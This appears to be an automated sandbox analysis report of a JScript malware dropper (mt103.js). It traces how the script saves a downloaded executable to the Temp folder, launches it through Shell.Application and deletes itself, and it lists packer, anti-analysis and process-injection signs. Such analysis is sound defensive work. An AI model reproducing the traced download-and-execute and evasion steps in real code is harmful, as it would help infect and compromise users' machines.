          Source: Binary string: wntdll.pdbUGP source: CasPol.exe, 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.357027677.0000000001565000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.354954352.00000000013C9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: CasPol.exe, 00000009.00000002.398224491.00000000032B0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: CasPol.exe, CasPol.exe, 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.357027677.0000000001565000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.354954352.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, control.exe
          Source: Binary string: control.pdbUGP source: CasPol.exe, 00000009.00000002.398224491.00000000032B0000.00000040.10000000.00040000.00000000.sdmp

          Data Obfuscation

          barindex
          JScript performs obfuscated calls to suspicious functions
          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateObject%22");ITextStream.WriteLine(" entry:1638 f:_0x296948 a0:391 a1:%228j7d%22");ITextStream.WriteLine(" exit:1638 f:_0x296948 r:%22ADODB.Stream%22");IHost.Name();ITextStream.WriteLine(" entry:1628 o:Windows%20Script%20Host f:CreateObject a0:%22ADODB.Stream%22");IHost.CreateObject("ADODB.Stream");IHost.Name();_Stream._00000000();ITextStream.WriteLine(" exit:1628 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:1766 f:_0x25c5ce a0:427");ITextStream.WriteLine(" exit:1766 f:_0x25c5ce r:%22Open%22");_Stream._00000000();ITextStream.WriteLine(" entry:1762 o: f:Open");_Stream.Open();_Stream._00000000();ITextStream.WriteLine(" exit:1762 o: f:Open r:undefined");ITextStream.WriteLine(" entry:1779 f:_0x25c5ce a0:386");ITextStream.WriteLine(" exit:1779 f:_0x25c5ce r:%22SC!i%22");ITextStream.WriteLine(" entry:1775 f:_0x2bbb97 a0:263 a1:%22SC!i%22");ITextStream.WriteLine(" exit:1775 f:_0x2bbb97 r:%22Type%22");_Stream.Type("1");ITextStream.WriteLine(" entry:1792 f:_0x25c5ce a0:432");ITextStream.WriteLine(" exit:1792 f:_0x25c5ce r:%22AR2w%22");ITextStream.WriteLine(" entry:1788 f:_0x2bbb97 a0:272 a1:%22AR2w%22");ITextStream.WriteLine(" exit:1788 f:_0x2bbb97 r:%22Write%22");ITextStream.WriteLine(" entry:1804 f:_0x25c5ce a0:425");ITextStream.WriteLine(" exit:1804 f:_0x25c5ce r:%22p3(5%22");ITextStream.WriteLine(" entry:1800 f:_0x2bbb97 a0:260 a1:%22p3(5%22");ITextStream.WriteLine(" exit:1800 f:_0x2bbb97 r:%22ResponseBody%22");IServerXMLHTTPRequest2.responseBody();_Stream._00000000();ITextStream.WriteLine(" entry:1784 o: f:Write a0:");_Stream.Write("Unsupported parameter type 00002011");_Stream._00000000();ITextStream.WriteLine(" exit:1784 o: f:Write r:undefined");ITextStream.WriteLine(" entry:1816 f:_0x296948 a0:416 a1:%22%26eII%22");ITextStream.WriteLine(" exit:1816 f:_0x296948 r:%22%40ZCL%22");ITextStream.WriteLine(" entry:1812 f:_0x2bbb97 a0:271 a1:%22%40ZCL%22");ITextStream.WriteLine(" exit:1812 f:_0x2bbb97 r:%22Position%22");_Stream.Position("0");ITextStream.WriteLine(" entry:1830 f:_0x25c5ce a0:386");ITextStream.WriteLine(" exit:1830 f:_0x25c5ce r:%22SC!i%22");ITextStream.WriteLine(" entry:1826 f:_0x2bbb97 a0:254 a1:%22SC!i%22");ITextStream.WriteLine(" exit:1826 f:_0x2bbb97 r:%22SaveToFile%22");_Stream._00000000();ITextStream.WriteLine(" entry:1822 o: f:SaveToFile a0:%22C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp%5CHBhG.exe%22 a1:2");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\HBhG.exe", "2");_Stream._00000000();ITextStream.WriteLine(" exit:1822 o: f:SaveToFile r:undefined");ITextStream.WriteLine(" entry:1841 f:_0x106d34 a0:255");ITextStream.WriteLine(" exit:1841 f:_0x106d34 r:%22Close%22");_Stream._00000000();ITextStream.WriteLine(" entry:1837 o: f:Close");_Stream.Close();_Stream._00000000();ITextStream.WriteLine(" exit:1837 o: f:Close r:undefined");ITextStream.WriteLine(" entry:1852 f:_0x106d34 a0:273");ITextStream.WriteLine(" exit:1852 f:_0x106d34 r:%22Shell.Application%22");ITextStream.WriteLine(" entry
          .NET source code contains method to dynamically call methods (often used by packers)
          Source: HBhG[1].exe.0.dr, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: HBhG.exe.0.dr, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 8.0.HBhG.exe.8a0000.0.unpack, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Potential obfuscated javascript found
          Source: mt103.jsInitial file: High amount of function use 12
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0041157F push esp; ret 9_2_0041161D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_004115EB push esp; ret 9_2_0041161D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0041B619 push edx; retf 9_2_0041B622
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00401E30 push eax; ret 9_2_00401E32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0177D0D1 push ecx; ret 9_2_0177D0E4
          Source: C:\Windows\explorer.exeCode function: 10_2_05987BF5 push ebx; ret 10_2_05987BFE
          Source: C:\Windows\explorer.exeCode function: 10_2_06DBFBF5 push ebx; ret 10_2_06DBFBFE
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010AD0D1 push ecx; ret 11_2_010AD0E4
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0051114E push 889F0DC1h; retf 11_2_00511153
          Source: HBhG[1].exe.0.drStatic PE information: 0xC2A5F7A7 [Sun Jun 25 22:52:23 2073 UTC]
          Source: initial sampleStatic PE information: section name: .text entropy: 7.9572107240717935
          Source: initial sampleStatic PE information: section name: .text entropy: 7.9572107240717935
          Source: HBhG[1].exe.0.dr, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.csHigh entropy of concatenated method names: '.cctor', 'EtPuOwMCPLr9b', 'r2IpAKlG6', 'hGsbFRpY8', 'IrZyuAlDu', 'fx9OFFByU', 'qTICie1Py', 'XWCmmQgZX', 'btCsQAPPe', 'VoCdgurnq'
          Source: HBhG[1].exe.0.dr, r2IAKlRG66GsFRpY8s/Rgao1DSUgXiqx7XtVU.csHigh entropy of concatenated method names: 'NaouOwMM6O7BT', '.ctor', '.cctor', 'IaPjRwsLA5A6wxgXlT', 'J2ZAvR413xLSNbSkcx', 'dgxHTSUaH58s29fuBK', 'RHrpukGC4afpqFJvyZ', 'HVn4AvCwdKviDqhZ6Q', 'Qun0pO8JZB7oSWWdnr', 'N2mR9GSHkXy0MyWMcR'
          Source: HBhG.exe.0.dr, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.csHigh entropy of concatenated method names: '.cctor', 'EtPuOwMCPLr9b', 'r2IpAKlG6', 'hGsbFRpY8', 'IrZyuAlDu', 'fx9OFFByU', 'qTICie1Py', 'XWCmmQgZX', 'btCsQAPPe', 'VoCdgurnq'
          Source: HBhG.exe.0.dr, r2IAKlRG66GsFRpY8s/Rgao1DSUgXiqx7XtVU.csHigh entropy of concatenated method names: 'NaouOwMM6O7BT', '.ctor', '.cctor', 'IaPjRwsLA5A6wxgXlT', 'J2ZAvR413xLSNbSkcx', 'dgxHTSUaH58s29fuBK', 'RHrpukGC4afpqFJvyZ', 'HVn4AvCwdKviDqhZ6Q', 'Qun0pO8JZB7oSWWdnr', 'N2mR9GSHkXy0MyWMcR'
          Source: 8.0.HBhG.exe.8a0000.0.unpack, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.csHigh entropy of concatenated method names: '.cctor', 'EtPuOwMCPLr9b', 'r2IpAKlG6', 'hGsbFRpY8', 'IrZyuAlDu', 'fx9OFFByU', 'qTICie1Py', 'XWCmmQgZX', 'btCsQAPPe', 'VoCdgurnq'
          Source: 8.0.HBhG.exe.8a0000.0.unpack, r2IAKlRG66GsFRpY8s/Rgao1DSUgXiqx7XtVU.csHigh entropy of concatenated method names: 'NaouOwMM6O7BT', '.ctor', '.cctor', 'IaPjRwsLA5A6wxgXlT', 'J2ZAvR413xLSNbSkcx', 'dgxHTSUaH58s29fuBK', 'RHrpukGC4afpqFJvyZ', 'HVn4AvCwdKviDqhZ6Q', 'Qun0pO8JZB7oSWWdnr', 'N2mR9GSHkXy0MyWMcR'
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\HBhG.exeJump to dropped file
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\HBhG[1].exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Deletes itself after installation
          Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\mt103.jsJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exe TID: 4728Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\control.exe TID: 4092Thread sleep count: 42 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\control.exe TID: 4092Thread sleep time: -84000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017F5BA5 rdtsc 9_2_017F5BA5
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 884Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 868Jump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_005031A0 FindFirstFileW,FindNextFileW,FindClose,11_2_005031A0
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 0000000A.00000000.362680234.00000000045B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000A.00000003.461371313.000000000F51B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017F5BA5 rdtsc 9_2_017F5BA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0172B171 mov eax, dword ptr fs:[00000030h]9_2_0172B171
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0172B171 mov eax, dword ptr fs:[00000030h]9_2_0172B171
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0172C962 mov eax, dword ptr fs:[00000030h]9_2_0172C962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0174B944 mov eax, dword ptr fs:[00000030h]9_2_0174B944
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0174B944 mov eax, dword ptr fs:[00000030h]9_2_0174B944
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0175513A mov eax, dword ptr fs:[00000030h]9_2_0175513A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0175513A mov eax, dword ptr fs:[00000030h]9_2_0175513A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01744120 mov eax, dword ptr fs:[00000030h]9_2_01744120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01744120 mov eax, dword ptr fs:[00000030h]9_2_01744120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01744120 mov eax, dword ptr fs:[00000030h]9_2_01744120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01744120 mov eax, dword ptr fs:[00000030h]9_2_01744120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01744120 mov ecx, dword ptr fs:[00000030h]9_2_01744120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01729100 mov eax, dword ptr fs:[00000030h]9_2_01729100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01729100 mov eax, dword ptr fs:[00000030h]9_2_01729100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01729100 mov eax, dword ptr fs:[00000030h]9_2_01729100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0172B1E1 mov eax, dword ptr fs:[00000030h]9_2_0172B1E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0172B1E1 mov eax, dword ptr fs:[00000030h]9_2_0172B1E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0172B1E1 mov eax, dword ptr fs:[00000030h]9_2_0172B1E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017B41E8 mov eax, dword ptr fs:[00000030h]9_2_017B41E8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017561A0 mov eax, dword ptr fs:[00000030h]9_2_017561A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017561A0 mov eax, dword ptr fs:[00000030h]9_2_017561A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017A69A6 mov eax, dword ptr fs:[00000030h]9_2_017A69A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0175A185 mov eax, dword ptr fs:[00000030h]9_2_0175A185
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0174C182 mov eax, dword ptr fs:[00000030h]9_2_0174C182
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017F1074 mov eax, dword ptr fs:[00000030h]9_2_017F1074
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017E2073 mov eax, dword ptr fs:[00000030h]9_2_017E2073
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01740050 mov eax, dword ptr fs:[00000030h]9_2_01740050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01740050 mov eax, dword ptr fs:[00000030h]9_2_01740050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0173B02A mov eax, dword ptr fs:[00000030h]9_2_0173B02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0173B02A mov eax, dword ptr fs:[00000030h]9_2_0173B02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0173B02A mov eax, dword ptr fs:[00000030h]9_2_0173B02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0173B02A mov eax, dword ptr fs:[00000030h]9_2_0173B02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017F4015 mov eax, dword ptr fs:[00000030h]9_2_017F4015
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017F4015 mov eax, dword ptr fs:[00000030h]9_2_017F4015
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017A7016 mov eax, dword ptr fs:[00000030h]9_2_017A7016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017A7016 mov eax, dword ptr fs:[00000030h]9_2_017A7016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017A7016 mov eax, dword ptr fs:[00000030h]9_2_017A7016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017BB8D0 mov eax, dword ptr fs:[00000030h]9_2_017BB8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017BB8D0 mov ecx, dword ptr fs:[00000030h]9_2_017BB8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017BB8D0 mov eax, dword ptr fs:[00000030h]9_2_017BB8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017BB8D0 mov eax, dword ptr fs:[00000030h]9_2_017BB8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017BB8D0 mov eax, dword ptr fs:[00000030h]9_2_017BB8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017BB8D0 mov eax, dword ptr fs:[00000030h]9_2_017BB8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0175F0BF mov ecx, dword ptr fs:[00000030h]9_2_0175F0BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0175F0BF mov eax, dword ptr fs:[00000030h]9_2_0175F0BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0175F0BF mov eax, dword ptr fs:[00000030h]9_2_0175F0BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017690AF mov eax, dword ptr fs:[00000030h]9_2_017690AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01729080 mov eax, dword ptr fs:[00000030h]9_2_01729080
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017A3884 mov eax, dword ptr fs:[00000030h]9_2_017A3884
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017A3884 mov eax, dword ptr fs:[00000030h]9_2_017A3884
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01753B7A mov eax, dword ptr fs:[00000030h]9_2_01753B7A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01753B7A mov eax, dword ptr fs:[00000030h]9_2_01753B7A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0172DB60 mov ecx, dword ptr fs:[00000030h]9_2_0172DB60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017F8B58 mov eax, dword ptr fs:[00000030h]9_2_017F8B58
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0172F358 mov eax, dword ptr fs:[00000030h]9_2_0172F358
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0172DB40 mov eax, dword ptr fs:[00000030h]9_2_0172DB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017E131B mov eax, dword ptr fs:[00000030h]9_2_017E131B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017503E2 mov eax, dword ptr fs:[00000030h]9_2_017503E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017503E2 mov eax, dword ptr fs:[00000030h]9_2_017503E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017503E2 mov eax, dword ptr fs:[00000030h]9_2_017503E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017503E2 mov eax, dword ptr fs:[00000030h]9_2_017503E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017503E2 mov eax, dword ptr fs:[00000030h]9_2_017503E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017503E2 mov eax, dword ptr fs:[00000030h]9_2_017503E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017F5BA5 mov eax, dword ptr fs:[00000030h]9_2_017F5BA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0175B390 mov eax, dword ptr fs:[00000030h]9_2_0175B390
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017E138A mov eax, dword ptr fs:[00000030h]9_2_017E138A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01731B8F mov eax, dword ptr fs:[00000030h]9_2_01731B8F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01731B8F mov eax, dword ptr fs:[00000030h]9_2_01731B8F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017DD380 mov ecx, dword ptr fs:[00000030h]9_2_017DD380
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0176927A mov eax, dword ptr fs:[00000030h]9_2_0176927A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017DB260 mov eax, dword ptr fs:[00000030h]9_2_017DB260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017DB260 mov eax, dword ptr fs:[00000030h]9_2_017DB260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017F8A62 mov eax, dword ptr fs:[00000030h]9_2_017F8A62
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017B4257 mov eax, dword ptr fs:[00000030h]9_2_017B4257
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01729240 mov eax, dword ptr fs:[00000030h]9_2_01729240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01729240 mov eax, dword ptr fs:[00000030h]9_2_01729240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01729240 mov eax, dword ptr fs:[00000030h]9_2_01729240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01729240 mov eax, dword ptr fs:[00000030h]9_2_01729240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0172AA16 mov eax, dword ptr fs:[00000030h]9_2_0172AA16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0172AA16 mov eax, dword ptr fs:[00000030h]9_2_0172AA16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01743A1C mov eax, dword ptr fs:[00000030h]9_2_01743A1C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01738A0A mov eax, dword ptr fs:[00000030h]9_2_01738A0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0173AAB0 mov eax, dword ptr fs:[00000030h]9_2_0173AAB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0173AAB0 mov eax, dword ptr fs:[00000030h]9_2_0173AAB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0175FAB0 mov eax, dword ptr fs:[00000030h]9_2_0175FAB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017252A5 mov eax, dword ptr fs:[00000030h]9_2_017252A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017252A5 mov eax, dword ptr fs:[00000030h]9_2_017252A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017252A5 mov eax, dword ptr fs:[00000030h]9_2_017252A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017252A5 mov eax, dword ptr fs:[00000030h]9_2_017252A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017252A5 mov eax, dword ptr fs:[00000030h]9_2_017252A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0175D294 mov eax, dword ptr fs:[00000030h]9_2_0175D294
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0175D294 mov eax, dword ptr fs:[00000030h]9_2_0175D294
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0174C577 mov eax, dword ptr fs:[00000030h]9_2_0174C577
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0174C577 mov eax, dword ptr fs:[00000030h]9_2_0174C577
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01747D50 mov eax, dword ptr fs:[00000030h]9_2_01747D50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01763D43 mov eax, dword ptr fs:[00000030h]9_2_01763D43
